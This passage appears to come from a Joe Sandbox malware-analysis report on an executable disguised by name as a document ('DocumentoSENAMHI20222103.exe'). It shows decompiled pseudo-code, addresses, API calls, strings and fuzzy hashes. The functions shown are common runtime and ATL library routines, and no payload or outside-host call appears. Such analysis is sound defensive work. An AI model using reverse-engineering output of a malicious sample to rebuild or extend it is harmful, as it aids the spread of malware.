					 *_t45 = _t66;
					E0015748C();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x00157ce5
0x00157cee
0x00157cf3
0x00157cfd
0x00157d00
0x00157d1d
0x00157d1e
0x00157d31
0x00157d36
0x00157d3e
0x00157d44
0x00157d47
0x00157d49
0x00157d50
0x00157d50
0x00157d52
0x00157d55
0x00157d58
0x00157d5f
0x00157d78
0x00157d7d
0x00157d7f
0x00157da0
0x00157da8
0x00157dab
0x00157dc6
0x00157dc9
0x00157dd0
0x00157dd4
0x00157dd6
0x00157ddd
0x00157de0
0x00157de2
0x00157de4
0x00157de6
0x00157df0
0x00157df0
0x00157df2
0x00157df8
0x00157dfb
0x00157dfd
0x00157e03
0x00157e04
0x00157e0a
0x00157e0d
0x00157e0e
0x00157e14
0x00157e17
0x00000000
0x00000000
0x00000000
0x00000000
0x00157de8
0x00157de8
0x00157de8
0x00157deb
0x00157dec
0x00157dec
0x00000000
0x00157de8
0x00157dd8
0x00000000
0x00157dd8
0x00157db0
0x00157db0
0x00157db1
0x00157db6
0x00157db8
0x00157dba
0x00157dbf
0x00157dbf
0x00000000
0x00157dbf
0x00157d81
0x00157d86
0x00157d88
0x00157d89
0x00000000
0x00157d89
0x00157d4b
0x00157d4e
0x00000000
0x00000000
0x00000000
0x00157d4e
0x00157d02
0x00157d05
0x00000000
0x00000000
0x00157d07
0x00157d0e
0x00157d0f
0x00157d11
0x00157d16
0x00000000
0x00157d16
0x00000000

Strings

C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe, xrefs: 00157D28, 00157D2F, 00157D65

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
API String ID: 0-3192360390
Opcode ID: 91124560bb36b8d5c8a74a5ecdf7c828f98c0d7e338284200fe92ee8a97e30d9
Instruction ID: 421f37c7824bee466a3f8279ee3990cd6e48c99e087ee8827e642a679ac912c4
Opcode Fuzzy Hash: 91124560bb36b8d5c8a74a5ecdf7c828f98c0d7e338284200fe92ee8a97e30d9
Instruction Fuzzy Hash: EF413671A08214EFCB15DF99AC869AEBBB8EF95711B140466EC249B291D7704E48CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001564B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E001564B6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00155DCC(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00155DCC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00154F23(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00154E56(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00156091(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00158A26(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x001564b6
0x001564b6
0x001564bd
0x001564c6
0x001565e5
0x001564cc
0x001564cc
0x001564cd
0x001564ce
0x001564d8
0x001564db
0x001564e1
0x001564eb
0x00156510
0x00156515
0x0015651a
0x001565e1
0x00000000
0x001565e2
0x0015651a
0x001564eb
0x00156520
0x00156523
0x00156526
0x0015652c
0x00156532
0x00156544
0x00156549
0x0015654c
0x0015654f
0x00156552
0x00156555
0x0015655b
0x00156561
0x00156564
0x00156567
0x00156576
0x00156577
0x00156577
0x0015657c
0x0015658f
0x00156591
0x00156596
0x001565a1
0x001565a3
0x001565a5
0x001565c1
0x001565c6
0x001565c9
0x001565c9
0x001565a1
0x00156596
0x001565cf
0x001565d0
0x001565d3
0x001565d6
0x001565d9
0x001565dc
0x00156567
0x00000000
0x0015655b
0x001565e6
0x001565eb
0x001565ef
0x001565f2
0x001565f3
0x001565f4
0x001565f5
0x001565fa
0x00156672
0x00156674
0x001565fc
0x001565fc
0x00156602
0x00000000
0x00156604
0x00156607
0x0015660a
0x00156611
0x00156614
0x00156618
0x0015664a
0x0015664d
0x00156654
0x0015665a
0x00156664
0x0015666d
0x0015666d
0x00156664
0x0015665a
0x0015666e
0x0015661a
0x0015661a
0x0015661a
0x0015661d
0x0015661d
0x00156621
0x00000000
0x00000000
0x00156625
0x00156639
0x00156639
0x00156627
0x00156627
0x0015662d
0x00000000
0x0015662f
0x0015662f
0x00156632
0x00156637
0x00000000
0x00000000
0x00000000
0x00000000
0x00156637
0x0015662d
0x00156642
0x00156644
0x00000000
0x00156646
0x00156646
0x00156646
0x00000000
0x00156644
0x0015663d
0x0015663f
0x00000000
0x0015663f
0x00000000
0x00000000
0x00000000
0x0015660a
0x00156602
0x00156675
0x00156679
0x00156679

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001564DB

Strings

MOC, xrefs: 001564ED
RCC, xrefs: 001564F5

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 955f7b55ad13c35c5badf6a8ff3c21dbeff77165cdadf8dfd665e4804778a67b
Instruction ID: 1673c18a6da0d20b54d52b6c57f29e2a04742a82df57ee3df9bb37f0abce520a
Opcode Fuzzy Hash: 955f7b55ad13c35c5badf6a8ff3c21dbeff77165cdadf8dfd665e4804778a67b
Instruction Fuzzy Hash: E0417971900209EFCF15CFA8CC81AAEBBB5FF08345F188199FD256B265E3359A54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00152C50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
stringCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00152C50(CHAR* __ebx, CHAR** __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				signed int _v8;
				char _v4104;
				signed int _v4108;
				intOrPtr _v4112;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				char _t38;
				char* _t52;
				intOrPtr* _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				char _t66;
				signed int _t67;
				signed int _t68;
				void* _t69;

				_t69 = __eflags;
				_t63 = __edx;
				_t51 = __ebx;
				E001602C0(0x100c);
				_t29 =  *0x169008; // 0x26a91022
				_v8 = _t29 ^ _t68;
				_v4108 = _v4108 & 0x00000000;
				_t64 = __ecx;
				_t66 = E001529E8(__ebx, __ecx, __ecx, _t65, _t69, _a4,  &_v4108);
				if(_t66 >= 0) {
					_push(__ebx);
					_t52 = _v4108;
					 *((intOrPtr*)(__ecx)) = _t52;
					if( *_t52 != 0) {
						while(1) {
							_t66 = E00152327(_t64,  &_v4104);
							if(_t66 < 0) {
								goto L7;
							}
							_t67 = 0;
							while(lstrcmpiA( &_v4104,  *(0x1661b0 + _t67 * 8)) != 0) {
								_t67 = _t67 + 1;
								if(_t67 < 0xe) {
									continue;
								} else {
									L6:
									_t66 = 0x80020009;
								}
								goto L7;
							}
							_t38 =  *((intOrPtr*)(0x1661b4 + _t67 * 8));
							_v4108 = _t38;
							__eflags = _t38;
							if(_t38 == 0) {
								goto L6;
							} else {
								_t66 = E00152327(_t64,  &_v4104);
								__eflags = _t66;
								if(_t66 < 0) {
									goto L7;
								} else {
									__eflags = _v4104 - 0x7b;
									if(_v4104 != 0x7b) {
										goto L6;
									} else {
										__eflags = _a8;
										_t60 = _t64;
										_push(0);
										if(_a8 == 0) {
											_push(0);
											_push(_v4108);
											_push( &_v4104);
											_t66 = E00152DA0(_t60, _t63);
											__eflags = _t66;
											if(_t66 < 0) {
												goto L7;
											} else {
												goto L16;
											}
										} else {
											_push(_a8);
											_push(_v4108);
											_v4112 =  *_t64;
											_push( &_v4104);
											_t66 = E00152DA0(_t60, _t63);
											__eflags = _t66;
											if(_t66 >= 0) {
												L16:
												E001522FE(_t64);
												__eflags =  *((char*)( *_t64));
												if( *((char*)( *_t64)) != 0) {
													continue;
												} else {
													goto L7;
												}
											} else {
												 *_t64 = _v4112;
												E00152DA0(_t64, _t63,  &_v4104, _v4108, 0, 0);
												goto L7;
											}
										}
									}
								}
							}
							L18:
						}
					}
					L7:
					__imp__CoTaskMemFree();
					_t32 = _t66;
					_t51 = _t52;
				}
				return E0015403C(_t32, _t51, _v8 ^ _t68, _t63, _t64, _t66);
				goto L18;
			}

0x00152c50
0x00152c50
0x00152c50
0x00152c58
0x00152c5d
0x00152c64
0x00152c6a
0x00152c73
0x00152c84
0x00152c88
0x00152c8a
0x00152c8b
0x00152c91
0x00152c96
0x00152c98
0x00152ca6
0x00152caa
0x00000000
0x00000000
0x00152cac
0x00152cae
0x00152cc6
0x00152cca
0x00000000
0x00152ccc
0x00152ccc
0x00152ccc
0x00152ccc
0x00000000
0x00152cca
0x00152ceb
0x00152cf2
0x00152cf8
0x00152cfa
0x00000000
0x00152cfc
0x00152d0a
0x00152d0c
0x00152d0e
0x00000000
0x00152d10
0x00152d10
0x00152d17
0x00000000
0x00152d19
0x00152d19
0x00152d1d
0x00152d1f
0x00152d21
0x00152d6b
0x00152d6d
0x00152d79
0x00152d7f
0x00152d81
0x00152d83
0x00000000
0x00000000
0x00000000
0x00000000
0x00152d23
0x00152d23
0x00152d28
0x00152d2e
0x00152d3a
0x00152d40
0x00152d42
0x00152d44
0x00152d89
0x00152d8b
0x00152d92
0x00152d95
0x00000000
0x00152d9b
0x00000000
0x00152d9b
0x00152d46
0x00152d58
0x00152d61
0x00000000
0x00152d61
0x00152d44
0x00152d21
0x00152d17
0x00152d0e
0x00000000
0x00152cfa
0x00152c98
0x00152cd1
0x00152cd2
0x00152cd8
0x00152cda
0x00152cda
0x00152ce8
0x00000000

APIs

Part of subcall function 001529E8: __EH_prolog3_GS.LIBCMT ref: 001529EF
Part of subcall function 001529E8: _strlen.LIBCMT ref: 00152A14
Part of subcall function 001529E8: CoTaskMemAlloc.OLE32(00000000,00000040,00152C84,?,00000000,00000000,?), ref: 00152A2E
Part of subcall function 001529E8: CoTaskMemFree.OLE32(?), ref: 00152C39

CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000000,?), ref: 00152CD2

Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
Part of subcall function 00152327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5

lstrcmpiA.KERNEL32(?,?,00000000,?,00000000,00000000,?), ref: 00152CBC

Strings

{, xrefs: 00152D10

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CharNext$Task$Free$AllocH_prolog3__strlenlstrcmpi
String ID: {
API String ID: 200014448-366298937
Opcode ID: 068b65584c1b222ff9a8bf64648d61dc112396956ee301d591127ab391f5fecd
Instruction ID: e9ef2d7e0590f34a60bad0cdb085f91370798c22eaa36ea47ba6cef279cd3122
Opcode Fuzzy Hash: 068b65584c1b222ff9a8bf64648d61dc112396956ee301d591127ab391f5fecd
Instruction Fuzzy Hash: 65319536E002A5DBCB239B64CC54BDEBBB4AB4A312F044195ED59EB241D7B4DDC8CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00151DBF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00151DBF(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				void* _t16;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t29;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				void* _t45;

				_t40 = __edi;
				_push(0x10);
				E00160216(0x1607fb, __ebx, __edi, __esi);
				_t28 = __edx;
				 *((intOrPtr*)(_t43 - 0x1c)) = __ecx;
				_t42 = 0;
				 *((intOrPtr*)(_t43 - 0x18)) = 0;
				 *((intOrPtr*)(_t43 - 4)) = 0;
				_t15 = E001575E7(L"REGISTRY") + 1;
				 *((intOrPtr*)(_t43 - 0x14)) = E001575E7(L"REGISTRY") + 1;
				_t16 = E00151181(_t43 - 0x14, _t15);
				_t45 = _t44 + 4;
				if(_t16 < 0) {
					L7:
					_t29 = 0x8007000e;
				} else {
					_t40 =  *((intOrPtr*)(_t43 - 0x14));
					_t49 = _t40 - 0x400;
					if(_t40 > 0x400 || E001511AE(_t28, _t40, _t40, 0, _t49) == 0) {
						_t20 = E00153CD7(_t43 - 0x18, _t42, _t40);
						_t42 =  *((intOrPtr*)(_t43 - 0x18));
					} else {
						E001602F0(_t40);
						_t20 = _t45;
					}
					_t21 = E00151251(_t20, L"REGISTRY", _t40, 3);
					_t51 = _t21;
					if(_t21 == 0) {
						goto L7;
					} else {
						_t29 = E00151B39(_t28,  *((intOrPtr*)(_t43 - 0x1c)), _t40, _t42, _t51, _t28,  *(_t43 + 8) & 0x0000ffff, _t21, 1);
					}
				}
				if(_t42 != 0) {
					do {
						_t40 =  *_t42;
						_t42 = _t40;
						E00157188(_t42);
					} while (_t40 != 0);
				}
				return E001601C5(_t29, _t40, _t42);
			}

0x00151dbf
0x00151dbf
0x00151dc6
0x00151dcb
0x00151dcd
0x00151dd0
0x00151dd2
0x00151dda
0x00151de2
0x00151de8
0x00151deb
0x00151df0
0x00151df5
0x00151e4c
0x00151e4c
0x00151df7
0x00151df7
0x00151dfa
0x00151e00
0x00151e1c
0x00151e21
0x00151e0d
0x00151e0f
0x00151e14
0x00151e14
0x00151e2e
0x00151e33
0x00151e35
0x00000000
0x00151e37
0x00151e48
0x00151e48
0x00151e35
0x00151e53
0x00151e55
0x00151e55
0x00151e58
0x00151e5a
0x00151e60
0x00151e55
0x00151e6e

APIs

__EH_prolog3_GS.LIBCMT ref: 00151DC6

Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1

__alloca_probe_16.LIBCMT ref: 00151E0F

Strings

REGISTRY, xrefs: 00151DD5, 00151E27

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: d6c6151a3d16bd2b6839709260d16e16f34457130aa571b1bbb07d0f95840221
Instruction ID: 9829658784dc7aa4e54e3e518beedb65d301bfd1feb5c8cd4b82892cc8914998
Opcode Fuzzy Hash: d6c6151a3d16bd2b6839709260d16e16f34457130aa571b1bbb07d0f95840221
Instruction Fuzzy Hash: 52119432F40215EBCB13AAA48C837FF72659F98701F154419BE21BF281EB749D5987D0

Uniqueness

Uniqueness Score: -1.00%

Function 00151F97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00151F97(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t29;
				void* _t30;
				intOrPtr* _t43;
				void* _t44;
				void* _t45;
				void* _t46;

				_t41 = __edi;
				_push(0x10);
				E00160216(0x1607fb, __ebx, __edi, __esi);
				_t29 = __edx;
				 *((intOrPtr*)(_t44 - 0x1c)) = __ecx;
				_t43 = 0;
				 *((intOrPtr*)(_t44 - 0x18)) = 0;
				 *(_t44 - 4) =  *(_t44 - 4) & 0;
				_t16 = E001575E7(L"REGISTRY") + 1;
				 *((intOrPtr*)(_t44 - 0x14)) = E001575E7(L"REGISTRY") + 1;
				_t17 = E00151181(_t44 - 0x14, _t16);
				_t46 = _t45 + 4;
				if(_t17 < 0) {
					L7:
					_t30 = 0x8007000e;
				} else {
					_t41 =  *((intOrPtr*)(_t44 - 0x14));
					_t50 = _t41 - 0x400;
					if(_t41 > 0x400 || E001511AE(_t29, _t41, _t41, 0, _t50) == 0) {
						_t21 = E00153CD7(_t44 - 0x18, _t43, _t41);
						_t43 =  *((intOrPtr*)(_t44 - 0x18));
					} else {
						E001602F0(_t41);
						_t21 = _t46;
					}
					_t22 = E00151251(_t21, L"REGISTRY", _t41, 3);
					_t52 = _t22;
					if(_t22 == 0) {
						goto L7;
					} else {
						_t30 = E00151B39(_t29,  *((intOrPtr*)(_t44 - 0x1c)), _t41, _t43, _t52, _t29,  *(_t44 + 8) & 0x0000ffff, _t22, 0);
					}
				}
				if(_t43 != 0) {
					do {
						_t41 =  *_t43;
						_t43 = _t41;
						E00157188(_t43);
					} while (_t41 != 0);
				}
				return E001601C5(_t30, _t41, _t43);
			}

0x00151f97
0x00151f97
0x00151f9e
0x00151fa3
0x00151fa5
0x00151fa8
0x00151faa
0x00151fad
0x00151fba
0x00151fc0
0x00151fc3
0x00151fc8
0x00151fcd
0x00152024
0x00152024
0x00151fcf
0x00151fcf
0x00151fd2
0x00151fd8
0x00151ff4
0x00151ff9
0x00151fe5
0x00151fe7
0x00151fec
0x00151fec
0x00152006
0x0015200b
0x0015200d
0x00000000
0x0015200f
0x00152020
0x00152020
0x0015200d
0x0015202b
0x0015202d
0x0015202d
0x00152030
0x00152032
0x00152038
0x0015202d
0x00152046

APIs

__EH_prolog3_GS.LIBCMT ref: 00151F9E

Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1

__alloca_probe_16.LIBCMT ref: 00151FE7

Strings

REGISTRY, xrefs: 00151FB0, 00151FFF

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: 9c7e19a5338605abdc57f869063b7331578c7fb78a5585c2736d81a5d6a29a72
Instruction ID: 6037a4936f3f21d237a4b73ec50eb7e978d79b9cddcedd7952c75b234a82ffd6
Opcode Fuzzy Hash: 9c7e19a5338605abdc57f869063b7331578c7fb78a5585c2736d81a5d6a29a72
Instruction Fuzzy Hash: 03119833F00115E7CB16AAA49C427BF72655F55712F144016FE21BF282EB749D49C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00153F8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00153F8E(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E00153FE1(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x150000;
				 *((intOrPtr*)(__ecx + 4)) = 0x150000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x1612e0;
				if(E001510C5(0x150000, __ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x292df9 = 1;
				}
				return _t13;
			}

0x00153f8f
0x00153f91
0x00153f9b
0x00153fa4
0x00153fa7
0x00153faa
0x00153fb1
0x00153fbf
0x00153fc9
0x00153fd0
0x00153fd0
0x00153fd6
0x00153fd6
0x00153fe0

APIs

Part of subcall function 001510C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00167488), ref: 001510CB
Part of subcall function 001510C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00167488), ref: 001510D5

IsDebuggerPresent.KERNEL32(?,?,?,0015106D), ref: 00153FC1
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0015106D), ref: 00153FD0

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00153FCB

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: dff3aed3336237b7f871626ec8d47dbe5ad1e17235fc4cade26cda091cb100dd
Instruction ID: 642b6e6812108e66718d5003568e26d9d89b63684be8a334384ba90724015629
Opcode Fuzzy Hash: dff3aed3336237b7f871626ec8d47dbe5ad1e17235fc4cade26cda091cb100dd
Instruction Fuzzy Hash: 65E03970600310DBD3209F69E9187827AE0AB14785F14881EE872DB680EBB095888BA6

Uniqueness

Uniqueness Score: -1.00%

Function 001521F6 Relevance: 5.0, APIs: 4, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E001521F6(CHAR* __ecx, short* __edx) {
				CHAR* _t12;
				short* _t13;

				_t12 = __ecx;
				_t13 = __edx;
				if(lstrcmpiA(__ecx, 0x165ebc) != 0) {
					if(lstrcmpiA(_t12, 0x165ec0) != 0) {
						if(lstrcmpiA(_t12, 0x165ec4) != 0) {
							if(lstrcmpiA(_t12, 0x165ec8) != 0) {
								 *_t13 = 0;
								return 0;
							}
							_push(0x11);
							L2:
							_pop(0x4008);
